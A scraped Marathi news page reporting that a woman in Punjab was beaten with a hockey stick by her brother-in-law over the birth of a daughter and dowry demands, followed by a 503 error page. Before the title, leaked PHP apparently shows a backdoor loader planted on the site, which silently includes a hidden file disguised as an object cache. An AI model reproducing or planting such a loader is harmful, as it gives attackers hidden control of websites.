add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुलगी झाली म्हणून महिलेला दिराची हॉकी स्टिकने मारहाण – SOCH INDIA
Menu

अपराध समाचार
मुलगी झाली म्हणून महिलेला दिराची हॉकी स्टिकने मारहाण

nobanner

आपल्या देशातील काही भागांत मुलगा आणि मुलगी ही भेदाची दरी अजूनही संपुष्टात आलेली नाही असे दिसते. मुलीही मुलांप्रमाणेच सक्षम आहेत हा सकारात्मक भाव अद्याप समाजात रुजलेला दिसत नाही. त्याचीच प्रचिती देणारा एक व्हिडिओ समोर आला आहे. हा व्हिडिओ पाहून तुमच्याही मनाला असंख्य वेदना होतील. या व्हिडिओमध्ये एका महिलेला काही जण अत्यंत निर्दयीपणे मारहाण करत आहेत. तिच्या पोटी मुलगी जन्माला आली, एवढीच तिची चूक झाली. यावरून तिचा दिर आणि त्याच्या मित्रांनी मिळून हॉकी स्टिकने बेदम मारहाण केली. हुंड्याच्या मागणीसाठीही त्यांनी तिला मारहाण केल्याचे सांगितले जाते.

हा व्हिडिओ पंजाबमधील घटनेचा आहे. या महिलेच्या पोटी मुलगी जन्माला आली. याशिवाय हुंड्यासाठीही या महिलेचा छळ करत होते. मुलगी झाली आणि हुंडाही मिळाला नाही, या कारणांवरून तिच्या दिराने तिला हॉकी स्टिकने बेदम मारहाण केली. या अमानुष मारहाणीत त्याचे मित्रही त्याला साथ देत होते. ही घटना १४ जुलैची असल्याचे सांगितले जाते. या प्रकरणी दोघांना अटक झाल्याचेही सांगितले जाते. मिळालेल्या माहितीनुसार, पीडित महिलेचे नाव मीना आहे. दलजित सिंह नावाच्या व्यक्तीशी तिचा विवाह झाला होता. मीनाने काही दिवसांपूर्वीच एका मुलीला जन्म दिला. सासरची मंडळी तिचा आणि मुलीचा स्वीकार करत नाहीत. याशिवाय सासरची मंडळी तिच्याकडे हुंड्याची मागणीही करत होते, असा आरोप केला जात आहे. ही महिला सध्या आपल्या पतीकडे राहत नाही. ही महिला ज्या ठिकाणी राहत होती, तिथे येऊन दिराने तिला मारहाण केली. मीनाचे दोन वर्षांपूर्वी लग्न झाले होते. तिला मुलगी झाली म्हणून तिच्या सासरचे लोक सात लाख रुपयांची मागणी करत आहेत, असे तिच्या वडिलांनी सांगितले. दरम्यान, या घटनेची पोलीस चौकशी करत असून मारहाण करणाऱ्या दोघांना पोलिसांनी ताब्यात घेतले आहे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.